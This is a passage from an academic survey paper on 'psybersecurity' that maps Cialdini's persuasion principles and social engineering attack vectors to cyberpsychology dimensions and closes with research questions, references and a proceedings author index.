Discusses psychology as a science of subject and comportment, beyond the mind and behavior
x
[18]
2017
Explains the scarcity principle and discusses examples
x
x
x
x
x x
x
(continued)
904
A. Chattopadhyay and N. Beyene Table 3. (continued)
Cited reference
Publication year
Description of work
1
2
3
[4]
2017
Discusses the impact of Cialdini’s principles on cybersecurity
x
x
[10]
2016
Discusses the eight dimensions of cyberpsychology architecture
x
[32]
2016
Describes the social psychology of cybersecurity
x
[3]
2016
Introduces the six (6) principles of influence and persuasion (reciprocity, consistency, social proof, liking, authority and scarcity)
[35]
2015
Discusses positive psychiatry
[19]
2014
Describes seven (7) examples of the liking principle
[2]
2014
Discusses psychology’s insight into human nature, which has a vital role to play in mitigating risks
x
[5]
2013
Describes the six (6) psychological elements behind sophisticated cyberattacks
x
[13]
2013
Discusses social engineering in the context of Cialdini’s psychology of persuasion and personality traits
[16]
2012
Describes how liking someone affects the human brain’s processing
[15]
2011
Presents a taxonomy for social engineering attacks
x
[30]
2006
Discusses methods of hacking in social engineering
x
[25]
2004
Describes the effect of social behaviors and discusses how this impacts society, along with the motivational analysis of social behavior by building on Jack Brehm’s contributions to psychology
x
x
x x
x
x
x
x
x
(continued)
A Survey Study of Psybersecurity
905
Table 3. (continued) Cited reference
Publication year
Description of work
[14]
2000
Summarizes psychology principles (Cialdini’s work) in relation to social engineering
1
2
3
x
x
6 Analyzing Psybersecurity Attacks (PSA): Survey Study Results 2 We now come to the section, where we present another important contribution plus a second set of notable results from our survey study. Tables 4 and 5 are presented next, and they represent another highlight from our work. Psychology has a crucial role in mitigating the risk of PSA under its insight into human nature, The shift of focus from technology to psychology is logical because even the most sophisticated security systems remain incapable of preventing people from falling victim to social engineering and thus risking financial plus social loss [2]. In this context, our study looks to dig deeper into dissecting a psybersecurity attack (PSA). A summary of this unique dissection-based analysis of PSA was presented in the form of Fig. 2, which was shown earlier in Sect. 1 of this paper. The upcoming Tables 4 and 5 describe Fig. 2 in more detail and illustrate the significance of this overall analysis work, as originally depicted visually through Fig. 2. In the following tables, we show how we analyze PSA, originating from psychiatric engineering (PE) and social engineering (SE), using the following layers: • causal elements and attack vector components, taken from Cialdini’s principles and their components, along with examples, aligning with the attack vectors, that are instrumental behind PE and SE, as explained earlier. • cyberpsychology dimensions, which are based upon the cyberpsychology architectural components referenced from existing literature, as discussed earlier.
906
A. Chattopadhyay and N. Beyene
Table 4. Causal and dimensional analysis of PE as PSA - left side shows linked principles of cialdini and their components as causes with related attack vector examples. Right side shows which of the 8 cyberpsychology dimension(s) the left elements map to. An ‘x’ mark indicates ‘left elements map to the corresponding cyberpsychology dimension’ PSA causes
PSA attack vector
Cyberpsychology dimensions
Psychiatric engineering (PE)
Causal components and examples
Physical Social Identity Interactive Text Sensory Temporal Reality
Principle of liking [5, 16, 27] Mirroring effect [26]
Physical attractiveness [19, 25]
x
Similarity [19, 25]
x
Compliments [19, 25]
x
Contact and cooperation [19, 25]
x
x
Conditioning-association [19, 25]
x
Social proof [5, 13, 14] Bandwagon effect [23, 25]
Advertisers often tell us that their product is the “largest selling” car, an album [23, 25]
x
Rule of reciprocation [5, 17] Intention, empathy, credibility [13, 14, 17]
Generalized [20, 21, 25]
x
Balanced [20, 21, 25]
x
Negative [20, 21, 25]
x
Commitment and consistency [5, 21] Confirmation Bias [27]
x
Principle of Authority [5, 13, 14] Judgment heuristics [13, 14, 25]
Asch and Milgram’s experiments [28]
Principle of scarcity [5, 18, 25] Decisions [3–5, 25]
Only five items left in stock [18, 25]
x
x
x
x
x
x
x
x
x
x
x
A Survey Study of Psybersecurity
907
Table 5. Causal and dimensional analysis of SE as PSA - left side shows linked principles of cialdini and their components as causes with related attack vector examples. Right side shows which of the 8 cyberpsychology dimension(s) the left elements map to. An ‘x’ mark indicates ‘left elements map to the corresponding cyberpsychology dimension’ PSA causes
PSA attack Vector
Cyberpsychology dimensions
Social engineering (SE)
Causal components and examples
Physical Social Identity Interactive Text Sensory Temporal Reality
Principle of liking [5, 16, 27] Person To person [5, 13, 14, 25]
Impersonation x [16, 25]
Social proof [5, 13, 14] Person-person via media [5, 13, 14, 25]
Person-Person via text [16, 25]
x
Person-person via voice [16, 25]
x
x
Person-Person via video [16, 25]
x
x
Rule of reciprocation [5, 17] Quid pro quo [24]
x
Manipulation [20, 21, 25]
x
Abuse of trust [20, 21, 25]
x
Commitment and consistency [5, 21] Foot in-the-door technique [13, 14, 25]
x
x
x
x
x
x
x
Principle of authority [5, 13, 14]
Whaling [15, 25]
x
x
Principle of scarcity [5, 18, 25] Reactance theory [26]
Hurry limited time offer [18, 19, 25]
x
x
x
x
x
x
x
x
x
908
A. Chattopadhyay and N. Beyene
7 Psybersecurity Amidst the COVID Pandemic In the current COVID pandemic, tension, stress, social distancing, lockdown-driven isolation, economic recession, and hackers’ opportunities to exploit others have risen dramatically. Cybersecurity attacks are being orchestrated around individual weaknesses related to face masks, preventative care, stimulus checks, and unemployment issues [1, 9, 38]. Latest cybersecurity attacks, namely, social engineering cases which include internet fraud, online scams, phishing and vishing have given rise to the hackers’ awareness of human vulnerabilities over the COVID outbreak. In addition, due to the ongoing pandemic, health has been placed at the forefront of media and individually prompted healthcare research has risen dramatically. A fortiori, for critical healthcare information people, are turning to the internet, including online COVID and other diseases related information, plus information on healthcare providers and medical professionals that influence one’s healthcare-related decision-making. The spread of misinformation, which has accelerated during the COVID pandemic, has led to the World Health Organization (WHO) referring to this issue as an “infodemic”, that has emerged as a new area of work, with researchers attempting to combat this problem. This implies that the risk of psybersecurity attacks (PSA) is also increasing. According to an online survey, since 2020 there has been an 85.2% increase in online healthcare searches, which correlates with the rise of health anxiety and other cyberpsychological issues [1, 9, 38]. This correlation indicates a need for proper guidance, advice, and awareness for the average online healthcare information (OHI) user. These may include tools that verify the authenticity and trustworthiness of the online data, including the credibility of the websites and information sources. Additionally, transparent, user-friendly measures for website evaluation and trustinducing web design elements will help enhance user reliability. Thus, in this context, psybersecurity needs to be considered by OHI providers as an important area for future research and development.
8 Future Scope of Work and Potential Research Directions With 1,473 reported cybersecurity breaches and over 164.68 million sensitive records exposed in the United States alone [1], the aftermath of these cyber-attacks extends beyond the technical repercussions, as these incidents also translate into psybersecurity attacks (PSA) that can seriously affect the mental health by bringing about changes in the mental setup, including mood, emotion, and behavior. Thus, the emerging field psybersecurity is now tasked with the responsibility of securing the mental health of people, which includes protection of human psychological well-being from the psychiatric consequences of technology usage, and involves the study of the mental health attack target plus vectors within the field of human security. There are prospectively different directions of work in this area, and one of the most relevant is within the healthcare field. In this context, consider the case for authentication-based information assurance techniques and technologies to aid safeguard the users’ mental health by enabling them to understand and better identify psybersecurity threats. This process includes discerning between trustworthy and untrustworthy online healthcare information (OHI) users and websites.
A Survey Study of Psybersecurity
909
In addition to studying psybersecurity related psychological plus behavioral components, and planning technological interventions, building a robust human-security network would add more protection to people’s psychological well-being. In this context, Dr. Louie attributes education and awareness of psybersecurity risks as integral to analyzing personal mental health. However, building a strong community of individuals that check up on each other’s mental states would also help identify a behavior change and possibly prevent the need for psychological assessments, treatments, or responses required for a psybersecurity attack incident. In summary, the following are open questions and research angles that we put together for the community in relation to future directions and scope of work: Research Question 1: How to design and develop effective defense mechanisms and systems that enable people to protect their data as well as mental health - both altogether from cybersecurity attacks? Research Question 2: How can the government and/or healthcare providers increase public awareness as well as educate average users to protect themselves from psybersecurity attacks along with defense from cybersecurity breaches? Research Question 3: How can cognitive psychology help in the defense from psybersecurity attacks, as well as in the fight against the ongoing “infodemic”? Research Question 4: What are psychological concepts, interdisciplinary theories, and other multi-disciplinary reference frameworks that can better assist in a more enhanced and improved analysis of the causes and effects of psybersecurity attacks? Research Question 5: What are the new/existing threat models and/or threat modeling ways that can be successfully used to investigate psybersecurity attacks? Research Question 6: How should vulnerable people, like the ones diagnosed with mental illness, trauma or other cyberpsychological issues, be treated after exposure to cybersecurity breaches, as well as after being subjected to psybersecurity attacks? What are the preventive and reactive measures that can be used in this regard?
9 Conclusion and Summary Psybersecurity is a relatively new term within the research literature and represents an emerging area that is affiliated with studying the threat posed by cybersecurity attacks on the human mind, and the corresponding risk mitigation process. Nowadays, in a digital world, each one of us uses technology for one or the other work. This creates a high risk of psybersecuriy attacks due to a cybersecurity breach or the consummation of misinformation on all of those technology users. This recent emergence of psybersecurity related topics and the infantile stage of research have generated a wide scope of future work. Overall, psybersecurity is an emerging topic within human security, and it has plenty of scope for future work, given that there has not been much research done in this area so far. To our knowledge, this is a first-of-its-kind system of knowledge paper - a survey study of the existing research literature related to this emerging field of psybersecurity. We envision that this survey study along with its outcomes, which include our compiled list of open research questions, our listing plus the nifty classification of relevant literature into notable categories, and our unique analyses of a psybersecurity attack from the
910
A. Chattopadhyay and N. Beyene
interdisciplinary contexts of Cialdini’s principles, along with the corresponding social engineering-related attack vector components, and the cyberpsychological domains, will provide the foundations for future reference and further explorations in this emerging topic plus research area. We hope that this work benefits readers as a useful information resource related to psybersecurity, and also paves the path forward towards further interdisciplinary research work. We believe that future research work on psybersecurity is much needed and would go a long way towards safeguarding people’s psychological well-being from attacks.
References 1. Franklin, C., Chattopadhyay, A.: Psybersecurity: a new emerging topic and research area within human security, IEEE Technol. Policy Ethics 6, 1–4 (2021). https://cmte.ieee.org/fut uredirections/tech-policy-ethics/march-2021/psybersecurity-part1/ 2. Wiederhold, B.: The role of psychology in enhancing cybersecurity, Psychology -Semantic Scholar (2014). https://www.semanticscholar.org/paper/The-Role-of-Psychology-in-Enhanc ing-Cybersecurity-Wiederhold/391c01487a3b0fab56f079a21e9d8dd551327bb3 3. Schawbel, D., Cialdini, R.: How to master the art of ‘pre-suasion’ (2016). https://www.forbes. com/sites/danschawbel/2016/09/06/robert-cialdini-how-to-master-the-art-of-pre-suasion/ 4. James, B.: The impact of the six principles of influence on cybersecurity (2017). https://www. linkedin.com/pulse/impact-six-principles-influence-cybersecurity-james-beary-aca5. Poulin, C.: 6 psychological elements behind sophisticated cyber-attacks (2013). https://sec urityintelligence.com/sophisticated-cyber-attacks-6-psychological-elements/ 6. Rosencrance, L., Bacon, M.: What are social engineering attacks? (2021). https://www.tec htarget.com/searchsecurity/definition/social-engineering 7. Techopedia: What is a targeted attack? - definition from Techopedia. http://www.techopedia. com/definition/76/targeted-attack 8. Elgan, M.: Why humans are a growing target for cyberattacks - and what to do about it (2019). https://securityintelligence.com/articles/why-humans-are-a-growing-targetfor-cyberattacks-and-what-to-do-about-it/ 9. Jungmann, S.M., Michael, W.: Health anxiety, cyberchondria, and coping in the current COVID-19 pandemic: which factors are related to coronavirus anxiety? J. Anxiety Disord. 73 (2020). https://doi.org/10.1016/j.janxdis.2020.102239. https://pubmed.ncbi.nlm.nih.gov/ 32502806/ 10. Suler, J.: The eight dimensions of cyberpsychology architecture: overview of a transdisciplinary model of digital environments and experiences (2016). https://www.researchgate.net/ publication/298615100_The_Eight_Dimensions_of_Cyberpsychology_Architecture_Ove rview_of_A_Transdisciplinary_Model_of_Digital_Environments_and_Experiences 11. Streff, J.: PsyberSecurity: where computer security meets psychology (2020). https://issuu. com/ilbankersassoc/docs/sept_oct_2020_web/s/11169723 12. Breda, F., Barbosa, H., Morais, T.: Social engineering and cyber security. In: INTED Proceedings (2017). https://www.researchgate.net/publication/315351300_SOCIAL_ENGINE ERING_AND_CYBER_SECURITY 13. Quiel, S.: Social engineering in the context of Cialdini’s psychology of persuasion and personality traits (2013). https://tore.tuhh.de/handle/11420/1126 14. Gibson, D.: Social engineering principles, get certified get ahead blog (2000). https://blogs. getcertifiedgetahead.com/social-engineering-principles/
A Survey Study of Psybersecurity
911
15. Ivaturi, K., Janczewski, L.: A taxonomy for social engineering attacks. Computer Science - Semantic Scholar (2011). https://www.semanticscholar.org/paper/A-Taxonomy-for-SocialEngineering-attacks-Ivaturi-Janczewski/fa433cf4d784c16bff7c824f304f071ce6b0da58 16. Hsu, C.: Liking someone affects how your brain processes the way they move (2012). https:// www.medicaldaily.com/liking-someone-affects-how-your-brain-processes-way-they-move242947 17. Sabater, V.: The law of psychological reciprocity (2021). https://exploringyourmind.com/thelaw-of-psychological-reciprocity/ 18. Cherry, K.: What is the scarcity principle? (2017). https://www.explorepsychology.com/sca rcity-principle/ 19. Hum, S.: Laws of attraction: 7 examples of the liking principle (2014). https://www.referralc andy.com/blog/liking-principle 20. Cherry, K.: Why do we feel compelled to return favors? (2022). https://www.verywellmind. com/what-is-the-rule-of-reciprocity-2795891 21. Fessenden T.: The principle of commitment and behavioral consistency. Online Website Forum - World Leaders in Research-Based User Experience (2018). https://www.nngroup. com/articles/commitment-consistency-ux/ 22. Ting, D.: Why cognitive biases and heuristics lead to an under-investment in cybersecurity (2021). https://dting01.medium.com/why-cognitive-biases-and-heuristics-lead-to-anunder-investment-in-cybersecurity-e41215253d90 23. Pandey, P., Mishra, S., Rai, P.: Social engineering and exploit development (2019). https:// www.academia.edu/42013795/Social_Engineering_and_Exploit_Development 24. Nadeem, M.S.: Social engineering: quid pro quo attacks, 2022. https://blog.mailfence.com/ quid-pro-quo-attacks/ 25. Wright, R.A., Greenberg, J., Brehm, S.S., Brehm, J.W.: Motivational analyses of social behavior: building on Jack Brehm’s contributions to psychology. Psychology Press (2004). https:// www.amazon.com/Motivational-Analyses-Social-Behavior-Contributions/dp/0805842667 26. Mackey, J.: What is mirroring, and what does it mean for your marriage? (2022). https://www. brides.com/story/what-is-mirroring-and-what-does-it-mean-for-your-marriage 27. Noor, I.: How confirmation bias works (2020). https://www.simplypsychology.org/confirmat ion-bias.html 28. Gürel, G.: Asch and Milgram experiments: Social Psychology (2021). https://mozartcultures. com/en/asch-and-milgram-experiments-social-psychology/ 29. Security Through Education: The Official Social Engineering Hub. Social Engineer, LLC (2022). https://www.social-engineer.org/ 30. Janwar, I.: Methods of hacking - social engineering (2006). https://www.academia.edu/490 3480/Methods_of_Hacking_Social_Engineering 31. Dunn, M., Dunn, M.: Cyber-security: 19: the routledge handbook of new security studies (2010). https://www.taylorfrancis.com/chapters/edit/10.4324/9780203859483-19/cybersecurity-myriam-dunn-cavelty 32. McAlaney, J., Thackray, H., Taylor, J.: The social psychology of cybersecurity (2016). https:// www.bps.org.uk/psychologist/social-psychology-cybersecurity 33. Pérez-Álvarez, M.: Psychology as a science of subject and comportment, beyond the mind and behaviour. Integr. Psychol. Behav. Sci. 52, 25–51 (2017). https://pubmed.ncbi.nlm.nih. gov/29063995/ 34. Cherry, K.: Cognitive psychology is the science of how we think, very well mind (2022). https://www.verywellmind.com/cognitive-psychology-4157181 35. Jeste , D.V.: Positive psychiatry: Its time has come, PubMed, 2015. https://pubmed.ncbi.nlm. nih.gov/26132670/ 36. Montañez, R., Golob, E., Xu, S.: Human cognition through the lens of social engineering cyberattacks. Front. Psychol (2020). https://doi.org/10.3389/fpsyg.2020.01755/full
912
A. Chattopadhyay and N. Beyene
37. Ohio State University. What Is Psychology? Department of Psychology. https://psychology. osu.edu/about/what-psychology 38. Laato, S., Islam, N., Whelan, E.: What drives unverified information sharing and cyberchondria during the COVID-19 pandemic? Eur. J. Inf. Syst. 29, 1–18 (2020). https://doi.org/10. 1080/0960085X.2020.1770632 39. American Psychiatric Association. What Is Psychiatry? Psychiatry.org. https://psychiatry.org/ patients-families/what-is-psychiatry 40. Michel, A.: Psyber security: thwarting hackers with behavioral science. APS Obs. 30(9) (2017). https://www.psychologicalscience.org/observer/psyber-security-thwarting-hackerswith-behavioral-science 41. Louie, R. K.: #Psybersecurity: the mental health attack surface. In: 41st IEEE Symposium on Security and Privacy (2020). http://www.ieee-security.org/TC/SP2020/program-shorttalks. html 42. Louie, R. K.: #Psybersecurity: mental health impacts of cyberattacks. In: RSA Conference, San Francisco, California. (2020). https://www.rsaconference.com/library#q=psybersecuritymental-health-impact-of-cyberattacks 43. Louie, R. K.: #Psybersecurity clinic (2020). https://psybersecurity.clinic/
Author Index
A Aalvik, Hege 796 Adenibuyan, Michael 349 Adeyiga, Johnson 349 Ahmad, Khurshid 79 Alieksieiev, Volodymyr 297 Anand, Amruth 242 Araghi, Tanya Koohpayeh 695 Ariffin, Suriyani 577 Atoum, Jalal Omer 25 Ayad, Mustafa 416 Ayala, Claudia 310 Ayele, Workneh Yilma 875
Dinesh, Dristi 602 Dlamini, Gcinizwe 11, 164 Dosunmu, Moyinoluwa 349 E El Orche, Fatima-Ezzahra F Francis, Idachaba
614
G Gallegos, Nickolas 396 Gogate, Mandar 328 Gutierrez-Garcia, Jose Luis
B Babbar, Sana Mohsin 218 Barmawi, Ari Moesriami 521 Belaissaoui, Mustapha 286 Bergui, Mohammed 341 Beyene, Nahom 893 Block, Sunniva 310 Bräck, Niclas Johansson 875 C Caceres, Juan Carlos Gutierrez 783 Chattopadhyay, Ankur 893 Chen, Zachary 759 Chenchev, Ivaylo 563 Chimbo, Bester 729 Clarke, Tyrone 416 Cruz, Mario Aquino 783 Cruzes, Daniela Soares 796 Cussi, Daniel Prado 39 D Daniec, Krzysztof 862 Dashtipour, Kia 328 de Luz Palomino Valdivia, Flor
674
783
59
H Hamilton, George 709 Heal, Maher 328 Heiden, Bernhard 297 Hetzler, Connor 759 Hollenstein, Marcel 674 Houdaigoui, Sarah 674 Huillcen Baca, Herwin Alayn
783
I Ifeoluwa, Afolayan 614 Iliev, Alexander 155 Iliev, Alexander I. 205, 242, 257 Iovan, Monica 796 J Jaccheri, Letizia 310 Jaoude, Gio Giorgio Abou Jedrasiak, Karol 862 Jiang, Xuan 385 Jones Jr., James H. 656 Jung, Jinu 1
© The Editor(s) (if applicable) and The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 913–915, 2023. https://doi.org/10.1007/978-3-031-28073-3
102
914
Author Index
K Kakhki, Fatemeh Davoudi 233 Kamimura, Ryotaro 117 Khan, Tahir M. 656, 709, 759 Kieu-Xuan, Thuc 446 King, Gordon 811, 824 Komolov, Sirojiddin 11 Krimm, Ronja 297 Kuestenmacher, Anastassia 183
P Palyonov, Vadim 164 Panwar, Malvika 205 Parekh, Swapnil 743 Patón-Romero, J. David 310 Pchelina, Daria 674 Pham, Anh-Duy 183 Pietro´n, Marcin 270 Ploeger, Paul G. 183 Podgorski, Hubert 862 Pozos-Parra, Maria del Pilar 59
L LaMalva, Grace 602 Lee, Seonglim 1 Leffler, Linus 875 Leider, Avery 102 Lin, Shih-Ping 135 Lu, Laurence 385 Lu, Zhengzhu 541 M MacFie, Joshua 396 Machaca Arceda, V. E. 39 MacKay, Jessica 416 Mahmoud, Ahmed Adel 635 Mansoor, Nazneen 155 Mbazirra, Alex V. 656 Megha, Swati 11 Megías, David 695 Meng, Bo 541 Ming, Gao 589 Moghadam, Armin 233 Montoya, Laura N. 482 Moselhy, Noha 635 Mosley, Pauline 102 Mrini, Younous El 286 Mtsweni, Jabu 729 Murali, Yatheendra Pravan Kidambi Mwim, Emilia N. 729 N Naccache, David 674 Najah, Said 341 Nawrat, Aleksander 862 Nguyen-Duc, Anh 796 Nikolov, Nikola S. 341 Nikolov, Ventsislav 474 Novocin, Andrew P. 849
Q Quach, Duc-Cuong
446
R Raksha, Ankitha 257 Recario, Reginald Neil C. 427 Roberts, Jennafer Shae 482 Rofiatunnajah, Nuril Kaunaini 521 Rønne, Peter B. 674 Rosales, Andrea 695 Roush, F. W. 362 Ryan, Peter Y. A. 674
79
S Samara, Kamil 96 Sanchez-DelaCruz, Eddy 59 Schmeelk, Suzanna 602 Shah, Devansh 743 Shukla, Pratyush 743 Sobolewski, Michael 372 Solis, Ivan Soria 783 Song, Linyue 385 Sopha, Alexis 396 Sotonwa, Kehinde 349 Stacho´n, Magdalena 270 Subburaj, Anitha Sarah 396 Subburaj, Vinitha Hannah 396 Suk, Jaehye 1 Sykes, Edward R. 502 T Tan, Lu 1 Tonino-Heiden, Bianca 297 Tumpalan, John Karl B. 427
Author Index
V Vogel, Carl 79
W Wang, Dejun 541 Wang, Hans 811, 824 Wang, Jiahui 541 Wang, Sheng-De 135 Wang, XiaoXiao 541 Wang, Xinyu 1 Weibel, Julien 674 Weil, Robert 674
915
Williams, Medina 709 Woronow, Paweł 862 Y Yong, Lau Chee 218 You, Junyong 455 Yusof, Nor Azeala Mohd 577 Z Zanina, Valeriya 164 Zhang, Zheng 455 Zhao, Can 541 Zingo, Pasquale A. T. 849 Zouhair, Yassine 286